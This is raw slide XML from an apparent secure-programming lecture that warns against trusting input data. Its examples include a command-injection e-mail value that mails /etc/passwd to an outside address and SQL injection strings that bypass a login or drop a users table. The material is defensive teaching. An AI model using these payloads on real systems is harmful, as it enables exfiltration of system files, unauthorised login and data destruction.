              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" smtClean="0"/>
              <a:t>Security Engineering: </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" i="1" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" smtClean="0"/>
              <a:t>	A Guide to </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" i="1" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" smtClean="0"/>
              <a:t>	Building Dependable </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" i="1" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" smtClean="0"/>
              <a:t>	Distributed Systems</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" i="1" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" i="1" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>(the book is </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>freely available </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>at </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>http://www.cl.cam.ac.uk/~rja14/book.html</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="53252" name="Picture 5" descr="C:\Sebastian\ComputerSecurity\my presentations\2008.05 - Computing Seminar\materials\book2coversmal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59375" y="1928813"/>
            <a:ext cx="212725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53380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Implementation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CC3300"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Bugs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t> appear in code, because </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" smtClean="0"/>
              <a:t>to err is human</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Some bugs can become </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
              </a:rPr>
              <a:t>vulnerabilities</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Attackers might discover an </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
              </a:rPr>
              <a:t>exploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t> for a vulnerability</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="CC3300"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
              </a:rPr>
              <a:t>What to do?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Read and follow guidelines for your programming language and software type</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Think of security implications</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Reuse trusted code (libraries, modules etc.)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Write good-quality, readable and maintainable code</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>(bad code won’t ever be secure)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Everything can get hacked</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8195" name="Picture 8" descr="RSA-Hacke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8" y="1009650"/>
            <a:ext cx="4657725" cy="534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9" descr="h4x0r-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3888" y="1285875"/>
            <a:ext cx="4422775" cy="331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10" descr="i-hacked-127-0-0-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1288" y="3636963"/>
            <a:ext cx="2652712" cy="292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11" descr="hacked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5363" y="4119563"/>
            <a:ext cx="2119312" cy="2281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\\cern.ch\dfs\Users\s\slopiens\Documents\Computer Security\Presentations\materials\fptld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5263" y="1052513"/>
            <a:ext cx="7459662" cy="4968875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6" name="Rounded Rectangle 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="21076162">
            <a:off x="4440238" y="5137150"/>
            <a:ext cx="4538662" cy="1298575"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FF9933"/>
          </a:solidFill>
          <a:ln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en-GB" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Procedures or docs that </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-GB" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>are impossible to follow;</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-GB" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>code impossible to maintain</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="58372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Things to avoid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Implementation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endParaRPr lang="en-US" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>What does this code do? Would you like to maintain it?</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="CC3300"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="59396" name="Text Box 4"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1258888" y="2419350"/>
            <a:ext cx="7057528" cy="3130744"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FF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945" tIns="41473" rIns="82945" bIns="41473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2200" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>@P=split//,".URRUU\c8R";@d=split//,"\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>nrekcah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>xinU</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> / </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>lreP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>rehtona</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>tsuJ</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>";sub p{@p{"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>r$p</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>","</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>u$p</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>"}=(P,P);pipe"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>r$p</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>","</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>u$p</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>";++$p;($q*=2)+=$f=!</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>fork;map</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>{$P=$P[$</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>f|ord</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>($p{$_})&amp;6];$p{$_}=/^$P/ix?$</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>P:close</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>$_}</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>keys%p</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>}</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>p;p;p;p;p;map</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>{$p{$_}=~/^[P.]/&amp;&amp; close$_}%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>p;wait</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> until$?; map{ /^r/&amp;&amp;&lt;$_&gt;}%p;$_=$d[$q];sleep rand(2) if/\S/;print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Enemy number one: Input data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b="1" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="CC3300"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" b="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Don’t trust input data</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t> – input data is the single most common reason of security-related incidents</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" i="1" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" i="1" smtClean="0"/>
              <a:t>Nearly every active attack out there is the result of some kind of input from an attacker. Secure programming is about making sure that inputs </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" i="1" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" i="1" smtClean="0"/>
              <a:t>from bad people do not do bad things.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>*</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Buffer overflow, invalid or malicious input, </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>code inside data…</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-US" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1700" smtClean="0"/>
              <a:t>* </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" i="1" smtClean="0"/>
              <a:t>Secure Programming Cookbook for C and C++ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" smtClean="0"/>
              <a:t>J. Viega, M. Messier</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1700" i="1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ChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="676275" y="3357563"/>
            <a:ext cx="8118475" cy="484187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Enemy #1: Input data (cont.)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6144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25450" y="1147763"/>
            <a:ext cx="8570913" cy="3249612"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" b="1" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" smtClean="0"/>
              <a:t>Example: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>your script sends e-mails with the following shell command:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="2200" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>	cat confirmation | mail $email</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>	and someone provides the following e-mail address:</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" i="1" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="2200" i="1" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2200" b="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>me@fake.com; cat /etc/passwd | mail me@real.com</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2200" b="1" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="CC3300"/>
              </a:solidFill>
              <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="61445" name="Rectangle 5"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="517525" y="4941888"/>
            <a:ext cx="8362950" cy="117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266700" indent="-266700">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="tx2"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="2200">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>	cat confirmation | mail </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2200" b="1">
                <a:solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>me@fake.com;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="266700" indent="-266700">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="tx2"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="2200" b="1">
                <a:solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>	cat /etc/passwd  | mail me@real.com</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2200" b="1">
              <a:solidFill>
                <a:srgbClr val="CC3300"/>
              </a:solidFill>
              <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="61446" name="AutoShape 6"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3673475" y="3981450"/>
            <a:ext cx="441325" cy="692150"/>
          </a:xfrm>
          <a:prstGeom prst="downArrow">
            <a:avLst>
              <a:gd name="adj1" fmla="val 49019"/>
              <a:gd name="adj2" fmla="val 39209"/>
            </a:avLst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ChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="476250" y="5021263"/>
            <a:ext cx="5175250" cy="482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67" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="479425" y="3429000"/>
            <a:ext cx="3948113" cy="4826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6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Enemy #1: Input data (cont.)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="62469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b="1" smtClean="0"/>
              <a:t>Example </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>(SQL Injection): your webscript authenticates users against a database:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2300" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>select count(*) from users where name = ’$name’ and pwd = ’$password’;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2300" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" smtClean="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>but an attacker provides one of these passwords: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3000" smtClean="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2300" b="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>anything’ or ’x’ = ’x</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2300" smtClean="0">
              <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2300" smtClean="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2300" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>select count(*) from users where name = ’$name’ and pwd = ’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2300" b="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>anything’ or ’x’ = ’x</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2300" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>’;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2300" smtClean="0">
              <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2300" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2300" b="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>XXXXX’; drop table users; --</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2300" smtClean="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2300" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>select count(*) from users where name = ’$name’ and pwd = ’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2300" b="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>XXXXX’; drop table users; --</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2300" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>’;</a:t>
            </a:r>
            <a:endParaRPr lang="pl-PL" sz="2300" smtClean="0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Input validation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110000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Input validation is </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
              </a:rPr>
              <a:t>crucial</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Consider all input </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
              </a:rPr>
              <a:t>dangerous</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
              </a:rPr>
              <a:t>until proven valid</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
